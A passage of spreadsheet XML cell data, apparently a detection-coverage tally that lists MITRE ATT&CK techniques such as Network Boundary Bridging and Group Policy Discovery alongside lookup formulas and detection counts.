      <c r="L71" s="394">
        <v>1</v>
      </c>
      <c r="M71" s="322">
        <v>1</v>
      </c>
      <c r="N71" s="322">
        <v>1</v>
      </c>
      <c r="O71" s="322" t="str">
        <f t="shared" si="16"/>
        <v>1 (1)</v>
      </c>
      <c r="P71" s="12">
        <v>1</v>
      </c>
      <c r="Q71" s="13">
        <v>1</v>
      </c>
      <c r="R71" s="394">
        <v>1</v>
      </c>
      <c r="S71" s="292">
        <v>4</v>
      </c>
      <c r="T71" s="322">
        <v>2</v>
      </c>
      <c r="U71" s="322" t="str">
        <f t="shared" si="17"/>
        <v>2 (4)</v>
      </c>
      <c r="V71" s="12">
        <v>2</v>
      </c>
      <c r="W71" s="13">
        <v>1</v>
      </c>
      <c r="X71" s="394">
        <v>2</v>
      </c>
      <c r="Y71" s="392">
        <v>10</v>
      </c>
      <c r="Z71" s="392">
        <v>7</v>
      </c>
      <c r="AA71" s="322" t="str">
        <f t="shared" si="18"/>
        <v>7 (10)</v>
      </c>
      <c r="AB71" s="392">
        <v>4</v>
      </c>
      <c r="AC71" s="16">
        <v>1</v>
      </c>
      <c r="AD71" s="394">
        <v>6</v>
      </c>
      <c r="AE71" s="392">
        <v>11</v>
      </c>
      <c r="AF71" s="392">
        <v>7</v>
      </c>
      <c r="AG71" s="322" t="str">
        <f t="shared" si="19"/>
        <v>7 (11)</v>
      </c>
      <c r="AH71" s="392">
        <v>4</v>
      </c>
      <c r="AI71" s="16">
        <v>1</v>
      </c>
      <c r="AJ71" s="394">
        <v>4</v>
      </c>
      <c r="AK71" s="392">
        <v>21</v>
      </c>
      <c r="AL71" s="392">
        <v>14</v>
      </c>
      <c r="AM71" s="322" t="str">
        <f t="shared" si="20"/>
        <v>14 (21)</v>
      </c>
      <c r="AN71" s="392">
        <v>8</v>
      </c>
      <c r="AO71" s="16">
        <v>1</v>
      </c>
      <c r="AP71" s="394">
        <v>7</v>
      </c>
      <c r="AQ71" s="292">
        <v>0</v>
      </c>
      <c r="AR71" s="322">
        <v>0</v>
      </c>
      <c r="AS71" s="322" t="str">
        <f t="shared" si="21"/>
        <v>0 (0)</v>
      </c>
      <c r="AT71" s="12">
        <v>0</v>
      </c>
      <c r="AU71" s="13">
        <v>0</v>
      </c>
      <c r="AV71" s="394">
        <v>0</v>
      </c>
      <c r="AW71" s="392">
        <v>2</v>
      </c>
      <c r="AX71" s="392">
        <v>1</v>
      </c>
      <c r="AY71" s="322" t="str">
        <f t="shared" si="22"/>
        <v>1 (2)</v>
      </c>
      <c r="AZ71" s="4">
        <v>1</v>
      </c>
      <c r="BA71" s="16">
        <v>1</v>
      </c>
      <c r="BB71" s="394">
        <v>1</v>
      </c>
      <c r="BC71" s="292">
        <v>6</v>
      </c>
      <c r="BD71" s="322">
        <v>3</v>
      </c>
      <c r="BE71" s="322" t="str">
        <f t="shared" si="23"/>
        <v>3 (6)</v>
      </c>
      <c r="BF71" s="12">
        <v>3</v>
      </c>
      <c r="BG71" s="13">
        <v>1</v>
      </c>
      <c r="BH71" s="394">
        <v>2</v>
      </c>
      <c r="BI71" s="292">
        <v>0</v>
      </c>
      <c r="BJ71" s="322">
        <v>0</v>
      </c>
      <c r="BK71" s="322" t="str">
        <f t="shared" si="24"/>
        <v>0 (0)</v>
      </c>
      <c r="BL71" s="12">
        <v>0</v>
      </c>
      <c r="BM71" s="13">
        <v>0</v>
      </c>
      <c r="BN71" s="394">
        <v>0</v>
      </c>
      <c r="BO71" s="292">
        <v>64</v>
      </c>
      <c r="BP71" s="322">
        <v>64</v>
      </c>
      <c r="BQ71" s="322" t="str">
        <f t="shared" si="25"/>
        <v>64 (64)</v>
      </c>
      <c r="BR71" s="12">
        <v>0</v>
      </c>
      <c r="BS71" s="12">
        <v>7</v>
      </c>
      <c r="BT71" s="13">
        <v>1</v>
      </c>
      <c r="BU71" s="394">
        <v>59</v>
      </c>
      <c r="BV71" s="292">
        <v>0</v>
      </c>
      <c r="BW71" s="322">
        <v>0</v>
      </c>
      <c r="BX71" s="322" t="str">
        <f t="shared" si="26"/>
        <v>0 (0)</v>
      </c>
      <c r="BY71" s="12">
        <v>0</v>
      </c>
      <c r="BZ71" s="13">
        <v>0</v>
      </c>
      <c r="CA71" s="394">
        <v>0</v>
      </c>
      <c r="CB71" s="292">
        <v>5</v>
      </c>
      <c r="CC71" s="322">
        <v>4</v>
      </c>
      <c r="CD71" s="322" t="str">
        <f t="shared" si="27"/>
        <v>4 (5)</v>
      </c>
      <c r="CE71" s="12">
        <v>0</v>
      </c>
      <c r="CF71" s="12">
        <v>1</v>
      </c>
      <c r="CG71" s="13">
        <v>1</v>
      </c>
      <c r="CH71" s="394">
        <v>4</v>
      </c>
    </row>
    <row r="72" spans="1:98" ht="15" customHeight="1">
      <c r="A72" s="4">
        <f t="shared" si="28"/>
        <v>70</v>
      </c>
      <c r="B72" s="4" t="str">
        <f>IFERROR(VLOOKUP(A72,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1599</v>
      </c>
      <c r="C72" s="4" t="str">
        <f>IFERROR(VLOOKUP(B72,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Network Boundary Bridging</v>
      </c>
      <c r="D72" s="4">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B72)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>2</v>
      </c>
      <c r="E72" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B72,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>8</v>
      </c>
      <c r="F72" s="286" t="str">
        <f t="shared" si="29"/>
        <v>2 (8)</v>
      </c>
      <c r="G72" s="292">
        <v>12</v>
      </c>
      <c r="H72" s="322">
        <v>5</v>
      </c>
      <c r="I72" s="322" t="str">
        <f t="shared" si="15"/>
        <v>5 (12)</v>
      </c>
      <c r="J72" s="12">
        <v>3</v>
      </c>
      <c r="K72" s="13">
        <v>1</v>
      </c>
      <c r="L72" s="394">
        <v>3</v>
      </c>
      <c r="M72" s="322">
        <v>0</v>
      </c>
      <c r="N72" s="322">
        <v>0</v>
      </c>
      <c r="O72" s="322" t="str">
        <f t="shared" si="16"/>
        <v>0 (0)</v>
      </c>
      <c r="P72" s="12">
        <v>0</v>
      </c>
      <c r="Q72" s="13">
        <v>0</v>
      </c>
      <c r="R72" s="394">
        <v>0</v>
      </c>
      <c r="S72" s="292">
        <v>12</v>
      </c>
      <c r="T72" s="322">
        <v>5</v>
      </c>
      <c r="U72" s="322" t="str">
        <f t="shared" si="17"/>
        <v>5 (12)</v>
      </c>
      <c r="V72" s="12">
        <v>3</v>
      </c>
      <c r="W72" s="13">
        <v>1</v>
      </c>
      <c r="X72" s="394">
        <v>3</v>
      </c>
      <c r="Y72" s="392">
        <v>16</v>
      </c>
      <c r="Z72" s="392">
        <v>8</v>
      </c>
      <c r="AA72" s="322" t="str">
        <f t="shared" si="18"/>
        <v>8 (16)</v>
      </c>
      <c r="AB72" s="392">
        <v>4</v>
      </c>
      <c r="AC72" s="16">
        <v>1</v>
      </c>
      <c r="AD72" s="394">
        <v>3</v>
      </c>
      <c r="AE72" s="392">
        <v>11</v>
      </c>
      <c r="AF72" s="392">
        <v>8</v>
      </c>
      <c r="AG72" s="322" t="str">
        <f t="shared" si="19"/>
        <v>8 (11)</v>
      </c>
      <c r="AH72" s="392">
        <v>3</v>
      </c>
      <c r="AI72" s="16">
        <v>1</v>
      </c>
      <c r="AJ72" s="394">
        <v>3</v>
      </c>
      <c r="AK72" s="392">
        <v>27</v>
      </c>
      <c r="AL72" s="392">
        <v>16</v>
      </c>
      <c r="AM72" s="322" t="str">
        <f t="shared" si="20"/>
        <v>16 (27)</v>
      </c>
      <c r="AN72" s="392">
        <v>7</v>
      </c>
      <c r="AO72" s="16">
        <v>1</v>
      </c>
      <c r="AP72" s="394">
        <v>3</v>
      </c>
      <c r="AQ72" s="292">
        <v>0</v>
      </c>
      <c r="AR72" s="322">
        <v>0</v>
      </c>
      <c r="AS72" s="322" t="str">
        <f t="shared" si="21"/>
        <v>0 (0)</v>
      </c>
      <c r="AT72" s="12">
        <v>0</v>
      </c>
      <c r="AU72" s="13">
        <v>0</v>
      </c>
      <c r="AV72" s="394">
        <v>0</v>
      </c>
      <c r="AW72" s="392">
        <v>4</v>
      </c>
      <c r="AX72" s="392">
        <v>3</v>
      </c>
      <c r="AY72" s="322" t="str">
        <f t="shared" si="22"/>
        <v>3 (4)</v>
      </c>
      <c r="AZ72" s="4">
        <v>1</v>
      </c>
      <c r="BA72" s="16">
        <v>1</v>
      </c>
      <c r="BB72" s="394">
        <v>3</v>
      </c>
      <c r="BC72" s="292">
        <v>16</v>
      </c>
      <c r="BD72" s="322">
        <v>8</v>
      </c>
      <c r="BE72" s="322" t="str">
        <f t="shared" si="23"/>
        <v>8 (16)</v>
      </c>
      <c r="BF72" s="12">
        <v>4</v>
      </c>
      <c r="BG72" s="13">
        <v>1</v>
      </c>
      <c r="BH72" s="394">
        <v>3</v>
      </c>
      <c r="BI72" s="292">
        <v>2</v>
      </c>
      <c r="BJ72" s="322">
        <v>2</v>
      </c>
      <c r="BK72" s="322" t="str">
        <f t="shared" si="24"/>
        <v>2 (2)</v>
      </c>
      <c r="BL72" s="12">
        <v>1</v>
      </c>
      <c r="BM72" s="13">
        <v>0.66666666666666663</v>
      </c>
      <c r="BN72" s="394">
        <v>2</v>
      </c>
      <c r="BO72" s="292">
        <v>8</v>
      </c>
      <c r="BP72" s="322">
        <v>8</v>
      </c>
      <c r="BQ72" s="322" t="str">
        <f t="shared" si="25"/>
        <v>8 (8)</v>
      </c>
      <c r="BR72" s="12">
        <v>1</v>
      </c>
      <c r="BS72" s="12">
        <v>2</v>
      </c>
      <c r="BT72" s="13">
        <v>0.66666666666666663</v>
      </c>
      <c r="BU72" s="394">
        <v>6</v>
      </c>
      <c r="BV72" s="292">
        <v>0</v>
      </c>
      <c r="BW72" s="322">
        <v>0</v>
      </c>
      <c r="BX72" s="322" t="str">
        <f t="shared" si="26"/>
        <v>0 (0)</v>
      </c>
      <c r="BY72" s="12">
        <v>0</v>
      </c>
      <c r="BZ72" s="13">
        <v>0</v>
      </c>
      <c r="CA72" s="394">
        <v>0</v>
      </c>
      <c r="CB72" s="292">
        <v>3</v>
      </c>
      <c r="CC72" s="322">
        <v>3</v>
      </c>
      <c r="CD72" s="322" t="str">
        <f t="shared" si="27"/>
        <v>3 (3)</v>
      </c>
      <c r="CE72" s="12">
        <v>0</v>
      </c>
      <c r="CF72" s="12">
        <v>1</v>
      </c>
      <c r="CG72" s="13">
        <v>1</v>
      </c>
      <c r="CH72" s="394">
        <v>3</v>
      </c>
    </row>
    <row r="73" spans="1:98" ht="15" customHeight="1">
      <c r="A73" s="4">
        <f t="shared" si="28"/>
        <v>71</v>
      </c>
      <c r="B73" s="4" t="str">
        <f>IFERROR(VLOOKUP(A73,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1602</v>
      </c>
      <c r="C73" s="4" t="str">
        <f>IFERROR(VLOOKUP(B73,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Data from Configuration Repository</v>
      </c>
      <c r="D73" s="4">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B73)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E73" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B73,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>2</v>
      </c>
      <c r="F73" s="286" t="str">
        <f t="shared" si="29"/>
        <v>1 (2)</v>
      </c>
      <c r="G73" s="292">
        <v>0</v>
      </c>
      <c r="H73" s="322">
        <v>0</v>
      </c>
      <c r="I73" s="322" t="str">
        <f t="shared" si="15"/>
        <v>0 (0)</v>
      </c>
      <c r="J73" s="12">
        <v>0</v>
      </c>
      <c r="K73" s="13">
        <v>0</v>
      </c>
      <c r="L73" s="394">
        <v>0</v>
      </c>
      <c r="M73" s="322">
        <v>396</v>
      </c>
      <c r="N73" s="322">
        <v>1</v>
      </c>
      <c r="O73" s="322" t="str">
        <f t="shared" si="16"/>
        <v>1 (396)</v>
      </c>
      <c r="P73" s="12">
        <v>1</v>
      </c>
      <c r="Q73" s="13">
        <v>1</v>
      </c>
      <c r="R73" s="394">
        <v>1</v>
      </c>
      <c r="S73" s="292">
        <v>396</v>
      </c>
      <c r="T73" s="322">
        <v>1</v>
      </c>
      <c r="U73" s="322" t="str">
        <f t="shared" si="17"/>
        <v>1 (396)</v>
      </c>
      <c r="V73" s="12">
        <v>1</v>
      </c>
      <c r="W73" s="13">
        <v>1</v>
      </c>
      <c r="X73" s="394">
        <v>1</v>
      </c>
      <c r="Y73" s="392">
        <v>792</v>
      </c>
      <c r="Z73" s="392">
        <v>2</v>
      </c>
      <c r="AA73" s="322" t="str">
        <f t="shared" si="18"/>
        <v>2 (792)</v>
      </c>
      <c r="AB73" s="392">
        <v>2</v>
      </c>
      <c r="AC73" s="16">
        <v>1</v>
      </c>
      <c r="AD73" s="394">
        <v>1</v>
      </c>
      <c r="AE73" s="392">
        <v>796</v>
      </c>
      <c r="AF73" s="392">
        <v>4</v>
      </c>
      <c r="AG73" s="322" t="str">
        <f t="shared" si="19"/>
        <v>4 (796)</v>
      </c>
      <c r="AH73" s="392">
        <v>4</v>
      </c>
      <c r="AI73" s="16">
        <v>1</v>
      </c>
      <c r="AJ73" s="394">
        <v>1</v>
      </c>
      <c r="AK73" s="392">
        <v>1588</v>
      </c>
      <c r="AL73" s="392">
        <v>6</v>
      </c>
      <c r="AM73" s="322" t="str">
        <f t="shared" si="20"/>
        <v>6 (1588)</v>
      </c>
      <c r="AN73" s="392">
        <v>6</v>
      </c>
      <c r="AO73" s="16">
        <v>1</v>
      </c>
      <c r="AP73" s="394">
        <v>1</v>
      </c>
      <c r="AQ73" s="292">
        <v>0</v>
      </c>
      <c r="AR73" s="322">
        <v>0</v>
      </c>
      <c r="AS73" s="322" t="str">
        <f t="shared" si="21"/>
        <v>0 (0)</v>
      </c>
      <c r="AT73" s="12">
        <v>0</v>
      </c>
      <c r="AU73" s="13">
        <v>0</v>
      </c>
      <c r="AV73" s="394">
        <v>0</v>
      </c>
      <c r="AW73" s="392">
        <v>792</v>
      </c>
      <c r="AX73" s="392">
        <v>2</v>
      </c>
      <c r="AY73" s="322" t="str">
        <f t="shared" si="22"/>
        <v>2 (792)</v>
      </c>
      <c r="AZ73" s="4">
        <v>2</v>
      </c>
      <c r="BA73" s="16">
        <v>1</v>
      </c>
      <c r="BB73" s="394">
        <v>1</v>
      </c>
      <c r="BC73" s="292">
        <v>1188</v>
      </c>
      <c r="BD73" s="322">
        <v>3</v>
      </c>
      <c r="BE73" s="322" t="str">
        <f t="shared" si="23"/>
        <v>3 (1188)</v>
      </c>
      <c r="BF73" s="12">
        <v>3</v>
      </c>
      <c r="BG73" s="13">
        <v>1</v>
      </c>
      <c r="BH73" s="394">
        <v>1</v>
      </c>
      <c r="BI73" s="292">
        <v>0</v>
      </c>
      <c r="BJ73" s="322">
        <v>0</v>
      </c>
      <c r="BK73" s="322" t="str">
        <f t="shared" si="24"/>
        <v>0 (0)</v>
      </c>
      <c r="BL73" s="12">
        <v>0</v>
      </c>
      <c r="BM73" s="13">
        <v>0</v>
      </c>
      <c r="BN73" s="394">
        <v>0</v>
      </c>
      <c r="BO73" s="292">
        <v>2</v>
      </c>
      <c r="BP73" s="322">
        <v>2</v>
      </c>
      <c r="BQ73" s="322" t="str">
        <f t="shared" si="25"/>
        <v>2 (2)</v>
      </c>
      <c r="BR73" s="12">
        <v>0</v>
      </c>
      <c r="BS73" s="12">
        <v>2</v>
      </c>
      <c r="BT73" s="13">
        <v>1</v>
      </c>
      <c r="BU73" s="394">
        <v>1</v>
      </c>
      <c r="BV73" s="292">
        <v>0</v>
      </c>
      <c r="BW73" s="322">
        <v>0</v>
      </c>
      <c r="BX73" s="322" t="str">
        <f t="shared" si="26"/>
        <v>0 (0)</v>
      </c>
      <c r="BY73" s="12">
        <v>0</v>
      </c>
      <c r="BZ73" s="13">
        <v>0</v>
      </c>
      <c r="CA73" s="394">
        <v>0</v>
      </c>
      <c r="CB73" s="292">
        <v>0</v>
      </c>
      <c r="CC73" s="322">
        <v>0</v>
      </c>
      <c r="CD73" s="322" t="str">
        <f t="shared" si="27"/>
        <v>0 (0)</v>
      </c>
      <c r="CE73" s="12">
        <v>0</v>
      </c>
      <c r="CF73" s="12">
        <v>0</v>
      </c>
      <c r="CG73" s="13">
        <v>0</v>
      </c>
      <c r="CH73" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="74" spans="1:98" ht="15" customHeight="1">
      <c r="A74" s="4">
        <f t="shared" si="28"/>
        <v>72</v>
      </c>
      <c r="B74" s="4" t="str">
        <f>IFERROR(VLOOKUP(A74,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1612</v>
      </c>
      <c r="C74" s="4" t="str">
        <f>IFERROR(VLOOKUP(B74,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Build Image on Host</v>
      </c>
      <c r="D74" s="4">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B74)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>2</v>
      </c>
      <c r="E74" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B74,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>188</v>
      </c>
      <c r="F74" s="286" t="str">
        <f t="shared" si="29"/>
        <v>2 (188)</v>
      </c>
      <c r="G74" s="292">
        <v>61</v>
      </c>
      <c r="H74" s="322">
        <v>12</v>
      </c>
      <c r="I74" s="322" t="str">
        <f t="shared" si="15"/>
        <v>12 (61)</v>
      </c>
      <c r="J74" s="12">
        <v>3</v>
      </c>
      <c r="K74" s="13">
        <v>1</v>
      </c>
      <c r="L74" s="394">
        <v>12</v>
      </c>
      <c r="M74" s="322">
        <v>1</v>
      </c>
      <c r="N74" s="322">
        <v>1</v>
      </c>
      <c r="O74" s="322" t="str">
        <f t="shared" si="16"/>
        <v>1 (1)</v>
      </c>
      <c r="P74" s="12">
        <v>1</v>
      </c>
      <c r="Q74" s="13">
        <v>0.5</v>
      </c>
      <c r="R74" s="394">
        <v>1</v>
      </c>
      <c r="S74" s="292">
        <v>62</v>
      </c>
      <c r="T74" s="322">
        <v>13</v>
      </c>
      <c r="U74" s="322" t="str">
        <f t="shared" si="17"/>
        <v>13 (62)</v>
      </c>
      <c r="V74" s="12">
        <v>4</v>
      </c>
      <c r="W74" s="13">
        <v>1</v>
      </c>
      <c r="X74" s="394">
        <v>13</v>
      </c>
      <c r="Y74" s="392">
        <v>66</v>
      </c>
      <c r="Z74" s="392">
        <v>17</v>
      </c>
      <c r="AA74" s="322" t="str">
        <f t="shared" si="18"/>
        <v>17 (66)</v>
      </c>
      <c r="AB74" s="392">
        <v>6</v>
      </c>
      <c r="AC74" s="16">
        <v>1</v>
      </c>
      <c r="AD74" s="394">
        <v>16</v>
      </c>
      <c r="AE74" s="392">
        <v>31</v>
      </c>
      <c r="AF74" s="392">
        <v>21</v>
      </c>
      <c r="AG74" s="322" t="str">
        <f t="shared" si="19"/>
        <v>21 (31)</v>
      </c>
      <c r="AH74" s="392">
        <v>5</v>
      </c>
      <c r="AI74" s="16">
        <v>1</v>
      </c>
      <c r="AJ74" s="394">
        <v>17</v>
      </c>
      <c r="AK74" s="392">
        <v>97</v>
      </c>
      <c r="AL74" s="392">
        <v>38</v>
      </c>
      <c r="AM74" s="322" t="str">
        <f t="shared" si="20"/>
        <v>38 (97)</v>
      </c>
      <c r="AN74" s="392">
        <v>11</v>
      </c>
      <c r="AO74" s="16">
        <v>1</v>
      </c>
      <c r="AP74" s="394">
        <v>30</v>
      </c>
      <c r="AQ74" s="292">
        <v>0</v>
      </c>
      <c r="AR74" s="322">
        <v>0</v>
      </c>
      <c r="AS74" s="322" t="str">
        <f t="shared" si="21"/>
        <v>0 (0)</v>
      </c>
      <c r="AT74" s="12">
        <v>0</v>
      </c>
      <c r="AU74" s="13">
        <v>0</v>
      </c>
      <c r="AV74" s="394">
        <v>0</v>
      </c>
      <c r="AW74" s="392">
        <v>4</v>
      </c>
      <c r="AX74" s="392">
        <v>4</v>
      </c>
      <c r="AY74" s="322" t="str">
        <f t="shared" si="22"/>
        <v>4 (4)</v>
      </c>
      <c r="AZ74" s="4">
        <v>2</v>
      </c>
      <c r="BA74" s="16">
        <v>1</v>
      </c>
      <c r="BB74" s="394">
        <v>4</v>
      </c>
      <c r="BC74" s="292">
        <v>66</v>
      </c>
      <c r="BD74" s="322">
        <v>17</v>
      </c>
      <c r="BE74" s="322" t="str">
        <f t="shared" si="23"/>
        <v>17 (66)</v>
      </c>
      <c r="BF74" s="12">
        <v>6</v>
      </c>
      <c r="BG74" s="13">
        <v>1</v>
      </c>
      <c r="BH74" s="394">
        <v>16</v>
      </c>
      <c r="BI74" s="292">
        <v>21</v>
      </c>
      <c r="BJ74" s="322">
        <v>5</v>
      </c>
      <c r="BK74" s="322" t="str">
        <f t="shared" si="24"/>
        <v>5 (21)</v>
      </c>
      <c r="BL74" s="12">
        <v>2</v>
      </c>
      <c r="BM74" s="13">
        <v>1</v>
      </c>
      <c r="BN74" s="394">
        <v>5</v>
      </c>
      <c r="BO74" s="292">
        <v>162</v>
      </c>
      <c r="BP74" s="322">
        <v>146</v>
      </c>
      <c r="BQ74" s="322" t="str">
        <f t="shared" si="25"/>
        <v>146 (162)</v>
      </c>
      <c r="BR74" s="12">
        <v>2</v>
      </c>
      <c r="BS74" s="12">
        <v>5</v>
      </c>
      <c r="BT74" s="13">
        <v>1</v>
      </c>
      <c r="BU74" s="394">
        <v>143</v>
      </c>
      <c r="BV74" s="292">
        <v>4</v>
      </c>
      <c r="BW74" s="322">
        <v>4</v>
      </c>
      <c r="BX74" s="322" t="str">
        <f t="shared" si="26"/>
        <v>4 (4)</v>
      </c>
      <c r="BY74" s="12">
        <v>4</v>
      </c>
      <c r="BZ74" s="13">
        <v>0.5</v>
      </c>
      <c r="CA74" s="394">
        <v>2</v>
      </c>
      <c r="CB74" s="292">
        <v>3</v>
      </c>
      <c r="CC74" s="322">
        <v>2</v>
      </c>
      <c r="CD74" s="322" t="str">
        <f t="shared" si="27"/>
        <v>2 (3)</v>
      </c>
      <c r="CE74" s="12">
        <v>0</v>
      </c>
      <c r="CF74" s="12">
        <v>2</v>
      </c>
      <c r="CG74" s="13">
        <v>0.5</v>
      </c>
      <c r="CH74" s="394">
        <v>2</v>
      </c>
    </row>
    <row r="75" spans="1:98" ht="15" customHeight="1">
      <c r="A75" s="4">
        <f t="shared" si="28"/>
        <v>73</v>
      </c>
      <c r="B75" s="4" t="str">
        <f>IFERROR(VLOOKUP(A75,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1615</v>
      </c>
      <c r="C75" s="4" t="str">
        <f>IFERROR(VLOOKUP(B75,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Group Policy Discovery</v>
      </c>
      <c r="D75" s="4">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B75)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E75" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B75,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>53</v>
      </c>
      <c r="F75" s="286" t="str">
        <f t="shared" si="29"/>
        <v>1 (53)</v>
      </c>
      <c r="G75" s="292">
        <v>39</v>
      </c>
      <c r="H75" s="322">
        <v>39</v>
      </c>
      <c r="I75" s="322" t="str">
        <f t="shared" si="15"/>
        <v>39 (39)</v>
      </c>
      <c r="J75" s="12">
        <v>1</v>
      </c>
      <c r="K75" s="13">
        <v>1</v>
      </c>
      <c r="L75" s="394">
        <v>39</v>
      </c>
      <c r="M75" s="322">
        <v>0</v>
      </c>
      <c r="N75" s="322">
        <v>0</v>
      </c>
      <c r="O75" s="322" t="str">
        <f t="shared" si="16"/>
        <v>0 (0)</v>
      </c>
      <c r="P75" s="12">
        <v>0</v>
      </c>
      <c r="Q75" s="13">
        <v>0</v>
      </c>
      <c r="R75" s="394">
        <v>0</v>
      </c>
      <c r="S75" s="292">
        <v>39</v>
      </c>
      <c r="T75" s="322">
        <v>39</v>
      </c>
      <c r="U75" s="322" t="str">
        <f t="shared" si="17"/>
        <v>39 (39)</v>
      </c>
      <c r="V75" s="12">
        <v>1</v>
      </c>
      <c r="W75" s="13">
        <v>1</v>
      </c>
      <c r="X75" s="394">
        <v>39</v>
      </c>
      <c r="Y75" s="392">
        <v>39</v>
      </c>
      <c r="Z75" s="392">
        <v>39</v>
      </c>
      <c r="AA75" s="322" t="str">
        <f t="shared" si="18"/>
        <v>39 (39)</v>
      </c>
      <c r="AB75" s="392">
        <v>1</v>
      </c>
      <c r="AC75" s="16">
        <v>1</v>
      </c>
      <c r="AD75" s="394">
        <v>39</v>
      </c>
      <c r="AE75" s="392">
        <v>10</v>
      </c>
      <c r="AF75" s="392">
        <v>10</v>
      </c>
      <c r="AG75" s="322" t="str">
        <f t="shared" si="19"/>
        <v>10 (10)</v>
      </c>
      <c r="AH75" s="392">
        <v>2</v>
      </c>
      <c r="AI75" s="16">
        <v>1</v>
      </c>
      <c r="AJ75" s="394">
        <v>5</v>
      </c>
      <c r="AK75" s="392">
        <v>49</v>
      </c>
      <c r="AL75" s="392">
        <v>49</v>
      </c>
      <c r="AM75" s="322" t="str">
        <f t="shared" si="20"/>
        <v>49 (49)</v>
      </c>
      <c r="AN75" s="392">
        <v>3</v>
      </c>
      <c r="AO75" s="16">
        <v>1</v>
      </c>
      <c r="AP75" s="394">
        <v>43</v>
      </c>
      <c r="AQ75" s="292">
        <v>0</v>
      </c>
      <c r="AR75" s="322">
        <v>0</v>
      </c>
      <c r="AS75" s="322" t="str">
        <f t="shared" si="21"/>
        <v>0 (0)</v>
      </c>
      <c r="AT75" s="12">
        <v>0</v>
      </c>
      <c r="AU75" s="13">
        <v>0</v>
      </c>
      <c r="AV75" s="394">
        <v>0</v>
      </c>
      <c r="AW75" s="392">
        <v>0</v>
      </c>
      <c r="AX75" s="392">
        <v>0</v>
      </c>
      <c r="AY75" s="322" t="str">
        <f t="shared" si="22"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ75" s="4">
        <v>0</v>
      </c>
      <c r="BA75" s="16">
        <v>0</v>
      </c>
      <c r="BB75" s="394">
        <v>0</v>
      </c>
      <c r="BC75" s="292">
        <v>39</v>
      </c>
      <c r="BD75" s="322">
        <v>39</v>
      </c>
      <c r="BE75" s="322" t="str">
        <f t="shared" si="23"/>
        <v>39 (39)</v>
      </c>
      <c r="BF75" s="12">
        <v>1</v>
      </c>
      <c r="BG75" s="13">
        <v>1</v>
      </c>
      <c r="BH75" s="394">
        <v>39</v>
      </c>
      <c r="BI75" s="292">
        <v>0</v>
      </c>
      <c r="BJ75" s="322">
        <v>0</v>
      </c>
      <c r="BK75" s="322" t="str">
        <f t="shared" si="24"/>
        <v>0 (0)</v>
      </c>
      <c r="BL75" s="12">
        <v>0</v>
      </c>
      <c r="BM75" s="13">
        <v>0</v>
      </c>
      <c r="BN75" s="394">
        <v>0</v>
      </c>
      <c r="BO75" s="292">
        <v>49</v>
      </c>
      <c r="BP75" s="322">
        <v>49</v>
      </c>
      <c r="BQ75" s="322" t="str">
        <f t="shared" si="25"/>
        <v>49 (49)</v>
      </c>
      <c r="BR75" s="12">
        <v>0</v>
      </c>
      <c r="BS75" s="12">
        <v>6</v>
      </c>
      <c r="BT75" s="13">
        <v>1</v>
      </c>
      <c r="BU75" s="394">
        <v>49</v>
      </c>
      <c r="BV75" s="292">
        <v>0</v>
      </c>
      <c r="BW75" s="322">
        <v>0</v>
      </c>
      <c r="BX75" s="322" t="str">
        <f t="shared" si="26"/>
        <v>0 (0)</v>
      </c>
      <c r="BY75" s="12">
        <v>0</v>
      </c>
      <c r="BZ75" s="13">
        <v>0</v>
      </c>
      <c r="CA75" s="394">
        <v>0</v>
      </c>
      <c r="CB75" s="292">
        <v>0</v>
      </c>
      <c r="CC75" s="322">
        <v>0</v>
      </c>
      <c r="CD75" s="322" t="str">
        <f t="shared" si="27"/>
        <v>0 (0)</v>
      </c>
      <c r="CE75" s="12">
        <v>0</v>
      </c>
      <c r="CF75" s="12">
        <v>0</v>
      </c>
      <c r="CG75" s="13">
        <v>0</v>
      </c>
      <c r="CH75" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="76" spans="1:98" ht="15" customHeight="1">
      <c r="A76" s="4">
        <f t="shared" si="28"/>
        <v>74</v>
      </c>
      <c r="B76" s="4" t="str">
        <f>IFERROR(VLOOKUP(A76,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1659</v>
      </c>
      <c r="C76" s="4" t="str">
        <f>IFERROR(VLOOKUP(B76,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Content Injection</v>
      </c>
      <c r="D76" s="4">
        <f>SUMPRODUCT(
